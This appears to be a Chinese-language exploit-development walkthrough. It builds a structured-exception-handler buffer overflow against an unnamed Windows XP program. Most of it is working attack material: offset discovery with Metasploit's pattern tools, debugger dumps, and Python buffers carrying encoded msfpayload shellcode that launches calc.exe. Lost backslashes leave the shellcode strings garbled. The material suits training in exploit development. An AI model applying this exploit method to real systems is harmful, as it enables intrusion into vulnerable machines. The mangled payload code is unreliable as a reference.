daniel@daniel-mint ~/msf/metasploit-framework/tools $$ ruby pattern_create.rb 2000Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
生成定位pattern
根据pattern查找位置
0:000 db poi(fs:0)0012f2c8 32 41 75 33 41 75 34 41-75 35 41 75 36 41 75 37 2Au3Au4Au5Au6Au70012f2d8 41 75 38 41 75 39 41 76-30 41 76 31 41 76 32 41 Au8Au9Av0Av1Av2A0012f2e8 76 33 41 76 34 41 76 35-41 76 36 41 76 37 41 76 v3Av4Av5Av6Av7Av0012f2f8 38 41 76 39 41 77 30 41-77 31 41 77 32 41 77 33 8Av9Aw0Aw1Aw2Aw30012f308 41 77 34 41 77 35 41 77-36 41 77 37 41 77 38 41 Aw4Aw5Aw6Aw7Aw8A0012f318 77 39 41 78 30 41 78 31-41 78 32 41 78 33 41 78 w9Ax0Ax1Ax2Ax3Ax0012f328 34 41 78 35 41 78 36 41-78 37 41 78 38 41 78 39 4Ax5Ax6Ax7Ax8Ax90012f338 41 79 30 41 79 31 41 79-32 41 79 33 41 79 34 41 Ay0Ay1Ay2Ay3Ay4A
Prelude zip [1..100] ['a'..'z'][(1,'a'),(2,'b'),(3,'c'),(4,'d'),(5,'e'),(6,'f'),(7,'g'),(8,'h'),(9,'i'),(10,'j'),(11,'k'),(12,'l'),(13,'m'),(14,'n'),(15,'o'),(16,'p'),(17,'q'),(18,'r'),(19,'s'),(20,'t'),(21,'u'),(22,'v'),(23,'w'),(24,'x'),(25,'y'),(26,'z')]
因此Au3-Aa0 = [u-a] * 10 + [3 - 0 ] = (21 - 1) * 10 + 3 = 203,即Au3是第203个三元组
所以2Au3是在203*3 = 609偏移处
或者
At9-Aa0 = [t - a + 1] * 10 = 200组,占据了600个字节,
Au0Au1Au2Au3
Prelude zip [601..700] ['A','u','0','A','u','1','A','u','2','A','u','3'][(601,'A'),(602,'u'),(603,'0'),(604,'A'),(605,'u'),(606,'1'),(607,'A'),(608,'u'),(609,'2'),(610,'A'),(611,'u'),(612,'3')]
因此是609偏移,或者说占据了609-612这四个字节。
参考:http://www.fuzzysecurity.com/tutorials/expDev/3.html
file
buffer = "A"*608 + "B"*4 + "C"*4 + "D"*(2000 - 608 - 8 - 8)
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
0012f2c8 42424242 43434343 44444444 444444440012f2d8 44444444 44444444 44444444 444444440012f2e8 44444444 44444444 44444444 444444440012f2f8 44444444 44444444 44444444 444444440012f308 44444444 44444444 44444444 444444440012f318 44444444 44444444 44444444 444444440012f328 44444444 44444444 44444444 444444440012f338 44444444 44444444 44444444 44444444
filebuf = "A"*608 + "xebx06x90x90" + "xb6xf7x47x00"buf += "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8b"buf += "x52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"buf += "x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20"buf += "xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8b"buf += "x42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0"buf += "x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8b"buf += "x34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01"buf += "xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2"buf += "x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1c"buf += "x01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5b"buf += "x61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86"buf += "x5dx6ax01x8dx85xb9x00x00x00x50x68x31x8b"buf += "x6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95xbd"buf += "x9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbb"buf += "x47x13x72x6fx6ax00x53xffxd5x63x61x6cx63"buf += "x2ex65x78x65x00"buf += "D"*(2000 - 608 - 8 - 8 - 200)
这种方式,并没有exploit成功,原因是shellcode中不能有x00,这会使字符串截止,而且msfpayload生成的payload中也包含x00,也无法使用。
因此需要使用msfencode进行加密,
daniel@daniel-mint ~/msf/metasploit-framework $$ ruby msfpayload windows/exec CMD=calc.exe R | ruby msfencode -b 'x00x0dx0ax1a' -t python -e x86/call4_dword_xor WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.9.1WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.9.1[*] x86/call4_dword_xor succeeded with size 224 (iteration=1)buf = ""buf += "x2bxc9x83xe9xcexe8xffxffxffxffxc0x5ex81"buf += "x76x0exdcx84x22x40x83xeexfcxe2xf4x20x6c"buf += "xabx40xdcx84x42xc9x39xb5xf0x24x57xd6x12"buf += "xcbx8ex88xa9x12xc8x0fx50x68xd3x33x68x66"buf += "xedx7bx13x80x70xb8x43x3cxdexa8x02x81x13"buf += "x89x23x87x3ex74x70x17x57xd6x32xcbx9exb8"buf += "x23x90x57xc4x5axc5x1cxf0x68x41x0cxd4xa9"buf += "x08xc4x0fx7ax60xddx57xc1x7cx95x0fx16xcb"buf += "xddx52x13xbfxedx44x8ex81x13x89x23x87xe4"buf += "x64x57xb4xdfxf9xdax7bxa1xa0x57xa2x84x0f"buf += "x7ax64xddx57x44xcbxd0xcfxa9x18xc0x85xf1"buf += "xcbxd8x0fx23x90x55xc0x06x64x87xdfx43x19"buf += "x86xd5xddxa0x84xdbx78xcbxcex6fxa4x1dxb6"buf += "x85xafxc5x65x84x22x40x8cxecx13xcbxb3x03"buf += "xddx95x67x74x97xe2x8axecx84xd5x61x19xdd"buf += "x95xe0x82x5ex4ax5cx7fxc2x35xd9x3fx65x53"buf += "xaexebx48x40x8fx7bxf7x23xbdxe8x41x6exb9"buf += "xfcx47x40"
然后写入shellcode
buf += "x2bxc9x83xe9xcexe8xffxffxffxffxc0x5ex81"buf += "x76x0exdcx84x22x40x83xeexfcxe2xf4x20x6c"buf += "xabx40xdcx84x42xc9x39xb5xf0x24x57xd6x12"buf += "xcbx8ex88xa9x12xc8x0fx50x68xd3x33x68x66"buf += "xedx7bx13x80x70xb8x43x3cxdexa8x02x81x13"buf += "x89x23x87x3ex74x70x17x57xd6x32xcbx9exb8"buf += "x23x90x57xc4x5axc5x1cxf0x68x41x0cxd4xa9"buf += "x08xc4x0fx7ax60xddx57xc1x7cx95x0fx16xcb"buf += "xddx52x13xbfxedx44x8ex81x13x89x23x87xe4"buf += "x64x57xb4xdfxf9xdax7bxa1xa0x57xa2x84x0f"buf += "x7ax64xddx57x44xcbxd0xcfxa9x18xc0x85xf1"buf += "xcbxd8x0fx23x90x55xc0x06x64x87xdfx43x19"buf += "x86xd5xddxa0x84xdbx78xcbxcex6fxa4x1dxb6"buf += "x85xafxc5x65x84x22x40x8cxecx13xcbxb3x03"buf += "xddx95x67x74x97xe2x8axecx84xd5x61x19xdd"buf += "x95xe0x82x5ex4ax5cx7fxc2x35xd9x3fx65x53"buf += "xaexebx48x40x8fx7bxf7x23xbdxe8x41x6exb9"buf += "xfcx47x40"buf += "D"*(2000 - 608 - 8 - 8 - 224-20)Exploit Development: Backtrack 5
Debugging Machine: Windows XP PRO SP3
Vulnerable Software:Download